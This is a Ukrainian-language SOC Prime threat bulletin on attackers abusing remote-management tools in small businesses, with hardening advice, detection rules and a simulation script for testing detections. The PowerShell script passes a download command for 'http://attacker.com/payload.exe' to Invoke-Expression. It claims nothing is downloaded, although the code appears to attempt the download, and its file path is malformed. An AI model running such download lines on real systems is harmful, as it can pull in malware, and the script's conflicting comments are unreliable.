SOC Prime Bias: Critical

04 Sep 2026 12:58 UTC

Безпека RMM для МСБ: Інструкція з посилення віддаленого доступу

Author Photo
SOC Prime Team linkedin icon Стежити
Безпека RMM для МСБ: Інструкція з посилення віддаленого доступу
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Атакувальники все частіше зловживають легітимними інструментами Remote Monitoring and Management (RMM) та Remote Desktop Services (RDS), щоб встановити наполегливість і підтримувати латеральний рух. Інструменти такі, як ConnectWise ScreenConnect, MeshAgent і VNC можуть бути озброєні через експлуатацію вразливостей або троянські інсталятори. Це створює значний виклик для малих і середніх підприємств, де шкідлива активність може дуже нагадувати легітимне ІТ-адміністрування.

Розслідування

Аналіз базується на телеметрії Acronis з понад 1,8 мільйона керованих кінцевих точок для оцінки ризиків, пов’язаних із RMM, для SMB та MSP. Дослідники виявили, що 63% кінцевих точок використовують кілька інструментів для віддаленого доступу, що розширює потенційну площину атаки. Дослідження згрупувало програмне забезпечення RMM у три категорії: інструменти для блокування, інструменти для моніторингу та зміцнення, а також інструменти для аудиту та обслуговування.

Пом’якшення

Організації повинні відключити непотрібні RDP-сервіси через Group Policy, впровадити Network Level Authentication (NLA) та вимагати MFA для всіх облікових записів адміністраторів RMM. Дозволене спискування застосунків може допомогти запобігти несанкціонованим установкам RMM, тоді як інфраструктура RMM, що має вихід в інтернет, повинна бути негайно запатчена. Маршрутизація віддаленого доступу через VPN або ZTNA шлюзи також рекомендується для зміцнення контролю доступу.

Відповідь

Коли виявляються несанкціоновані інструменти RMM, організації повинні негайно розслідувати джерело їх установки та шукати пов’язані крадіжки облікових даних або латеральний рух. Несанкціоновану активність MeshAgent слід вважати підтвердженим компрометацією. Автоматичне видалення може бути неефективним, якщо присутні механізми наполегливості, що вимагає ескалації до ручної відповіді на інциденти та глибшого форензичного розслідування.

Потік атаки

Ми все ще оновлюємо цю частину.

Виявлення

Альтернативне Програмне Забезпечення для Віддаленого Доступу/Управління (через process_creation)

Команда SOC Prime
04 вересня 2026

Можлива спроба віддаленого виконання команди ScreenConnect (через cmdline)

Команда SOC Prime
04 вересня 2026

Альтернативне Програмне Забезпечення для Віддаленого Доступу/Управління (через system)

Команда SOC Prime
04 вересня 2026

Альтернативне Програмне Забезпечення для Віддаленого Доступу/Управління (через audit)

Команда SOC Prime
04 вересня 2026

Використання PowerShell для розгортання шкідливого програмного забезпечення [Windows Powershell]

Правила AI команди SOC Prime
04 вересня 2026

Виявлення змін у конфігурації RDP для несанкціонованого доступу [Подія реєстру Windows]

Правила AI команди SOC Prime
04 вересня 2026

Виконання моделювання

Передумова: Тест телеметрії та попередня перевірка повинні пройти.

Причина: Цей розділ детально описує точне виконання техніки противника (TTP), розробленої для спрацьовування правила виявлення. Команди та наратив МАЮТЬ безпосередньо відображати ідентифіковані TTP та спрямовані на створення точної телеметрії, очікуваної логікою виявлення. Абстрактні або не пов’язані приклади призведуть до неправильного діагнозу.

  • Наратив атаки та команди: Противник отримав початковий доступ до робочої станції через фішинговий вантаж. Щоб встановити наполегливість та віддалений контроль, вони мають намір розгорнути віддалений троян. Вони виконують однорядковий сценарій PowerShell, який, хоча б і не завантажує вантаж у цьому моделюванні, містить сигнатурний рядок AsyncRAT в межах блока сценарію для імітації фази розгортання установки шкідливого програмного забезпечення. Це імітує те, як атакувальник використовує простий сценарій для завантаження свого інструментарію.

  • Сценарій тестування регресії:

    # Сценарій моделювання, що спрацьовує правило виявлення, вставляючи цільовий рядок.
    # Примітка: Це не шкідливе моделювання, створене лише для отримання телеметрії.
    
    $SimulatedMalwareName = "AsyncRAT"
    Write-Host "Ініціація послідовності розгортання для $SimulatedMalwareName..."
    
    # Цей блок симулює логіку завантажувача/встановлювача
    $payload = "Invoke-WebRequest -Uri 'http://attacker.com/payload.exe' -OutFile '$env:TEMPmalware.exe'"
    
    # Виконання рядка, щоб забезпечити його відображення в Script Block Log (Подія 4104)
    Invoke-Expression "Write-Output 'Розгортаємо $SimulatedMalwareName...'; $payload"
  • Команди очистки:

    # Очистка: Видаліть будь-які артефакти, якщо вони були фактично створені.
    # У цьому моделюванні жодні файли фактично не завантажені.
    Remove-Item -Path "$env:TEMPmalware.exe" -ErrorAction SilentlyContinue
    Write-Host "Очистку завершено."